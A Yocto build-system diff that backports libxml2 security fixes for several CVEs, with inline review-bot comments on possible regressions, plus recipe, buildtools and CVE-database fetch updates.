+For some reason, xmlCtxtUseOptionsInternal set the start and end element
+SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
+was specified. This means that custom SAX handlers could never work with
+that flag because these functions would receive the wrong user data
+argument and crash immediately.
+
+Fixes #535.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 6e09208..7814e6e 100644
+--- a/parser.c
++++ b/parser.c
+@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
+ }
+ #ifdef LIBXML_SAX1_ENABLED
+ if (options & XML_PARSE_SAX1) {
+- ctxt->sax->startElement = xmlSAX2StartElement;
+- ctxt->sax->endElement = xmlSAX2EndElement;
+ ctxt->sax->startElementNs = NULL;
+ ctxt->sax->endElementNs = NULL;
+ ctxt->sax->initialized = 1;
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
new file mode 100644
index 0000000000..ebd9868fac
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
+From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 8 May 2023 17:58:02 +0200
+Subject: [PATCH] SAX: Always initialize SAX1 element handlers
+
+Follow-up to commit d0c3f01e. A parser context will be initialized to
+SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
+so we must initialize the SAX1 element handlers as well.
+
+Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
+we don't switch to SAX1 if the SAX2 element handlers are NULL.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ SAX2.c | 11 +++++++----
+ parser.c | 5 +----
+ 2 files changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/SAX2.c b/SAX2.c
+index 5f141f9..902d34d 100644
+--- a/SAX2.c
++++ b/SAX2.c
+@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
+ {
+ if (hdlr == NULL) return(-1);
+ if (version == 2) {
+- hdlr->startElement = NULL;
+- hdlr->endElement = NULL;
+ hdlr->startElementNs = xmlSAX2StartElementNs;
+ hdlr->endElementNs = xmlSAX2EndElementNs;
+ hdlr->serror = NULL;
+ hdlr->initialized = XML_SAX2_MAGIC;
+ #ifdef LIBXML_SAX1_ENABLED
+ } else if (version == 1) {
+- hdlr->startElement = xmlSAX2StartElement;
+- hdlr->endElement = xmlSAX2EndElement;
+ hdlr->initialized = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+ } else
+ return(-1);
++#ifdef LIBXML_SAX1_ENABLED
++ hdlr->startElement = xmlSAX2StartElement;
++ hdlr->endElement = xmlSAX2EndElement;
++#else
++ hdlr->startElement = NULL;
++ hdlr->endElement = NULL;
++#endif /* LIBXML_SAX1_ENABLED */
+ hdlr->internalSubset = xmlSAX2InternalSubset;
+ hdlr->externalSubset = xmlSAX2ExternalSubset;
+ hdlr->isStandalone = xmlSAX2IsStandalone;
+diff --git a/parser.c b/parser.c
+index 7814e6e..cf0fb38 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
+ if (ctxt == NULL) return;
+ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
+- ((sax->startElementNs != NULL) ||
+- (sax->endElementNs != NULL) ||
+- ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
+ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+--
+2.24.4
+
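Review bot: The simplified test in `xmlDetectSAX2` now selects SAX2 for every handler whose `initialized` is `XML_SAX2_MAGIC`, including one that supplies only `startElement`/`endElement` and leaves both `startElementNs` and `endElementNs` NULL. Under the condition being removed such a handler stayed in SAX1 mode, so an application built that way would presumably stop receiving element callbacks after this backport. For a stable-branch CVE fix that is a behaviour change worth stating in the patch header, for example `Note: handlers marked XML_SAX2_MAGIC are now always parsed as SAX2; SAX1-only callers must pass XML_PARSE_SAX1`.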
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
new file mode 100644
index 0000000000..b177cdaba0
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
+From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 14 Aug 2020 14:18:50 +0200
+Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
+
+Running xmllint with "--sax --noout" installs a SAX2 handler with all
+callbacks set to NULL. In this case or similar situations, we don't want
+to switch to SAX1 parsing.
+
+Note: This patch is needed for "CVE-2023-39615-0002" patch to apply.
+Without this patch the build will fail with undefined sax error.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index bb677b0..6e09208 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
+ */
+ static void
+ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
++ xmlSAXHandlerPtr sax;
+ if (ctxt == NULL) return;
++ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((ctxt->sax) && (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
+- ((ctxt->sax->startElementNs != NULL) ||
+- (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
++ ((sax->startElementNs != NULL) ||
++ (sax->endElementNs != NULL) ||
++ ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
new file mode 100644
index 0000000000..182bb29abd
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
+From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 2 Nov 2022 15:44:42 +0100
+Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
+
+Found with libFuzzer, see #344.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 507869efe..647288ce3 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ if (doc->intSubset == NULL) {
+ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ q->doc = doc;
+ q->parent = parent;
+ doc->intSubset = (xmlDtdPtr) q;
+@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ } else
+ #endif /* LIBXML_TREE_ENABLED */
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ node = node->next;
+ }
+ return(ret);
++error:
++ xmlFreeNodeList(ret);
++ return(NULL);
+ }
+
+ /**
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
new file mode 100644
index 0000000000..c7e9681e6a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
+From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 23 Aug 2023 20:24:24 +0200
+Subject: [PATCH] tree: Fix copying of DTDs
+
+- Don't create multiple DTD nodes.
+- Fix UAF if malloc fails.
+- Skip DTD nodes if tree module is disabled.
+
+Fixes #583.
+
+CVE: CVE-2023-45322
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 6c8a875b9..02c1b5791 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4471,29 +4471,28 @@ xmlNodePtr
+ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ xmlNodePtr ret = NULL;
+ xmlNodePtr p = NULL,q;
++ xmlDtdPtr newSubset = NULL;
+
+ while (node != NULL) {
+-#ifdef LIBXML_TREE_ENABLED
+ if (node->type == XML_DTD_NODE ) {
+- if (doc == NULL) {
++#ifdef LIBXML_TREE_ENABLED
++ if ((doc == NULL) || (doc->intSubset != NULL)) {
+ node = node->next;
+ continue;
+ }
+- if (doc->intSubset == NULL) {
+- q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) goto error;
+- q->doc = doc;
+- q->parent = parent;
+- doc->intSubset = (xmlDtdPtr) q;
+- xmlAddChild(parent, q);
+- } else {
+- q = (xmlNodePtr) doc->intSubset;
+- xmlAddChild(parent, q);
+- }
+- } else
++ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
++ if (q == NULL) goto error;
++ q->doc = doc;
++ q->parent = parent;
++ newSubset = (xmlDtdPtr) q;
++#else
++ node = node->next;
++ continue;
+ #endif /* LIBXML_TREE_ENABLED */
++ } else {
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) goto error;
++ if (q == NULL) goto error;
++ }
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ node = node->next;
+ }
++ if (newSubset != NULL)
++ doc->intSubset = newSubset;
+ return(ret);
+ error:
+ xmlFreeNodeList(ret);
+--
+GitLab
+
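Review bot: The skip test `(doc == NULL) || (doc->intSubset != NULL)` does not look at `newSubset`, and `doc->intSubset` is only assigned after the loop, so a second `XML_DTD_NODE` in the same sibling list would be copied as well and overwrite `newSubset`. That would leave two DTD copies in the returned list, which is what the first bullet of the commit message sets out to prevent; whether such a list can occur is not visible here. Extending the test to `if ((doc == NULL) || (doc->intSubset != NULL) || (newSubset != NULL)) {` would close the gap.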
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
new file mode 100644
index 0000000000..31183399f8
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
+From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 9 Nov 2020 17:55:44 +0100
+Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
+ XIncludes
+
+Don't process XIncludes in the result of another inclusion to avoid
+infinite recursion resulting in a call stack overflow.
+
+This is something the XInclude engine shouldn't allow but correct
+handling of intra-document includes would require major changes.
+
+Found by OSS-Fuzz.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
+CVE: CVE-2024-25062 #Dependency Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 01adf74f4..72e40b032 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1585,7 +1585,8 @@ node_found:
+ /*
+ * Handle XInclude if asked for
+ */
+- if ((reader->xinclude) && (reader->node != NULL) &&
++ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+ ((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
new file mode 100644
index 0000000000..5365d5546a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
+From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 14 Oct 2023 22:45:54 +0200
+Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
+ backtracking
+
+Fixes a use-after-free if XML Reader if used with DTD validation and
+XInclude expansion.
+
+Fixes #604.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
+CVE: CVE-2024-25062
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 979385a13..fefd68e0b 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1443,6 +1443,7 @@ node_found:
+ * Handle XInclude if asked for
+ */
+ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->state != XML_TEXTREADER_BACKTRACK) &&
+ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
-Add 'install-ptest' rule. Print a standard result line for
-each test.
+From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
+From: Tony Tascioglu <tony.tascioglu@windriver.com>
+Date: Tue, 11 May 2021 11:57:46 -0400
+Subject: [PATCH] Add 'install-ptest' rule.
+
+Print a standard result line for each test.
Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
-Upstream-Status: Backport
+Upstream-Status: Pending
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
---
- Makefile.am | 9 ++++
+ Makefile.am | 9 +++
runsuite.c | 1 +
runtest.c | 2 +
runxmlconf.c | 1 +
- testapi.c | 122 ++++++++++++++++++++++++++++++---------------
- testchar.c | 156 +++++++++++++++++++++++++++++++++++++++++-----------------
+ testapi.c | 122 ++++++++++++++++++++++++++-------------
+ testchar.c | 156 +++++++++++++++++++++++++++++++++++---------------
testdict.c | 1 +
testlimits.c | 1 +
testrecurse.c | 2 +
9 files changed, 210 insertions(+), 85 deletions(-)
diff --git a/Makefile.am b/Makefile.am
-index 9c630be..7cfd04b 100644
+index 05d1671f..ae622745 100644
--- a/Makefile.am
+++ b/Makefile.am
-@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS)
+@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
#testOOM_DEPENDENCIES = $(DEPS)
#testOOM_LDADD= $(LDADDS)
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
[ -d test ] || $(LN_S) $(srcdir)/test .
diff --git a/runsuite.c b/runsuite.c
-index aaab13e..9ba2c5d 100644
+index d24b5ec3..f7ff2521 100644
--- a/runsuite.c
+++ b/runsuite.c
-@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
if (logfile != NULL)
fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
}
#else /* !SCHEMAS */
diff --git a/runtest.c b/runtest.c
-index addda5c..8ba5d59 100644
+index ffa98d04..470f95cb 100644
--- a/runtest.c
+++ b/runtest.c
-@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) {
+@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
xmlCharEncCloseFunc(ebcdicHandler);
xmlCharEncCloseFunc(eucJpHandler);
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
return(err);
}
-@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
xmlCleanupParser();
xmlMemoryDump();
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
}
diff --git a/runxmlconf.c b/runxmlconf.c
-index cef20f4..4f291fb 100644
+index 70f61017..e882b3a1 100644
--- a/runxmlconf.c
+++ b/runxmlconf.c
@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
}
diff --git a/testapi.c b/testapi.c
-index 4a751e2..7ccc066 100644
+index ff8b470d..52b51d78 100644
--- a/testapi.c
+++ b/testapi.c
@@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
}
diff --git a/testchar.c b/testchar.c
-index 0d08792..f555d3b 100644
+index 6866a175..7bce0132 100644
--- a/testchar.c
+++ b/testchar.c
@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
/*
* Cleanup function for the XML library.
diff --git a/testdict.c b/testdict.c
-index 40bebd0..114b934 100644
+index 40bebd05..114b9347 100644
--- a/testdict.c
+++ b/testdict.c
@@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
return(ret);
}
diff --git a/testlimits.c b/testlimits.c
-index 68c94db..1584434 100644
+index 059116a6..f0bee68d 100644
--- a/testlimits.c
+++ b/testlimits.c
@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
return(ret);
}
diff --git a/testrecurse.c b/testrecurse.c
-index f95ae1c..74c8f8b 100644
+index 0cbe25a6..3ecadb40 100644
--- a/testrecurse.c
+++ b/testrecurse.c
@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
return(ret);
}
--
-2.7.4
+2.25.1
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
SUMMARY = "XML C Parser Library and Toolkit"
DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat."
-HOMEPAGE = "http://www.xmlsoft.org/"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
SECTION = "libs"
LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
DEPENDS = "zlib virtual/libiconv"
-SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
- http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
+inherit gnomebase
+
+SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
file://libxml-64bit.patch \
file://runtest.patch \
file://run-ptest \
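Review bot: The rewritten `SRC_URI +=` line still fetches the W3C test suite over plain `http://www.w3.org/...`, so the only integrity control on that tarball is the pinned `SRC_URI[testtar.sha256sum]`. Since this change already moves the main archive to the GNOME mirror, I would switch the test tarball to the `https://` form of the same URL as well, assuming the server serves that path over TLS. The `SRC_URI[testtar.md5sum]` entry kept further down could be dropped, as the commit does for the main archive, so that SHA-256 is the single checksum of record.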
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
file://CVE-2020-7595.patch \
file://CVE-2019-20388.patch \
file://CVE-2020-24977.patch \
+ file://CVE-2021-3517.patch \
+ file://CVE-2021-3537.patch \
+ file://CVE-2021-3518.patch \
+ file://CVE-2021-3541.patch \
+ file://CVE-2022-23308.patch \
+ file://CVE-2022-23308-fix-regression.patch \
+ file://CVE-2022-29824-dependent.patch \
+ file://CVE-2022-29824.patch \
+ file://0001-Port-gentest.py-to-Python-3.patch \
+ file://CVE-2016-3709.patch \
+ file://CVE-2022-40303.patch \
+ file://CVE-2022-40304.patch \
+ file://CVE-2023-28484.patch \
+ file://CVE-2023-29469.patch \
+ file://CVE-2023-39615-pre.patch \
+ file://CVE-2023-39615-0001.patch \
+ file://CVE-2023-39615-0002.patch \
+ file://CVE-2021-3516.patch \
+ file://CVE-2023-45322-1.patch \
+ file://CVE-2023-45322-2.patch \
+ file://CVE-2024-25062-pre1.patch \
+ file://CVE-2024-25062.patch \
"
-SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5"
-SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
+SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
inherit autotools pkgconfig binconfig-disabled ptest features_check
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
-RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
+RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
@@ -81,6 +103,16 @@ do_configure_prepend () {
}
do_compile_ptest() {
+ # Make sure that testapi.c is newer than gentests.py, because
+ # with reproducible builds, they will both get e.g. Jan 1 1970
+ # modification time from SOURCE_DATE_EPOCH and then check-am
+ # might try to rebuild_testapi, which will fail even with
+ # 0001-Port-gentest.py-to-Python-3.patch, because it needs
+ # libxml2 module (libxml2-native dependency and correctly
+ # set PYTHON_SITE_PACKAGES), it's easier to
+ # just rely on pre-generated testapi.c from the release
+ touch ${S}/testapi.c
+
oe_runmake check-am
}
diff --git a/meta/recipes-core/meta/buildtools-extended-tarball.bb b/meta/recipes-core/meta/buildtools-extended-tarball.bb
index c32d0107c3..83e3fddccc 100644
--- a/meta/recipes-core/meta/buildtools-extended-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-extended-tarball.bb
@@ -28,8 +28,21 @@ TOOLCHAIN_HOST_TASK += "\
nativesdk-libtool \
nativesdk-pkgconfig \
nativesdk-glibc-utils \
+ nativesdk-glibc-gconv-ibm850 \
+ nativesdk-glibc-gconv-iso8859-1 \
+ nativesdk-glibc-gconv-utf-16 \
+ nativesdk-glibc-gconv-cp1250 \
+ nativesdk-glibc-gconv-cp1251 \
+ nativesdk-glibc-gconv-cp1252 \
+ nativesdk-glibc-gconv-euc-jp \
+ nativesdk-glibc-gconv-libjis \
nativesdk-libxcrypt-dev \
+ nativesdk-parted \
+ nativesdk-dosfstools \
+ nativesdk-gptfdisk \
"
+# gconv-cp1250, cp1251 and euc-jp needed for iconv to work in vim builds
+# also copied list from uninative
TOOLCHAIN_OUTPUTNAME = "${SDK_ARCH}-buildtools-extended-nativesdk-standalone-${DISTRO_VERSION}"
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index 434ffdc334..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
# Generate new (mini) sdk-environment-setup file
script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
touch $script
- echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:$PATH' >> $script
+ echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 0cd3a1c153..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
deltask do_install
deltask do_populate_sysroot
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# Timeout for blocking socket operations, such as the connection attempt.
+CVE_SOCKET_TIMEOUT ?= "60"
+NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
+
python () {
if not bb.data.inherits_class("cve-check", d):
raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
}
-python do_populate_cve_db() {
+python do_fetch() {
"""
Update NVD database with json data feed
"""
import bb.utils
import bb.progress
- import sqlite3, urllib, urllib.parse, shutil, gzip
- from datetime import date
+ import shutil
bb.utils.export_proxies(d)
- BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
- YEAR_START = 2002
-
db_file = d.getVar("CVE_CHECK_DB_FILE")
db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
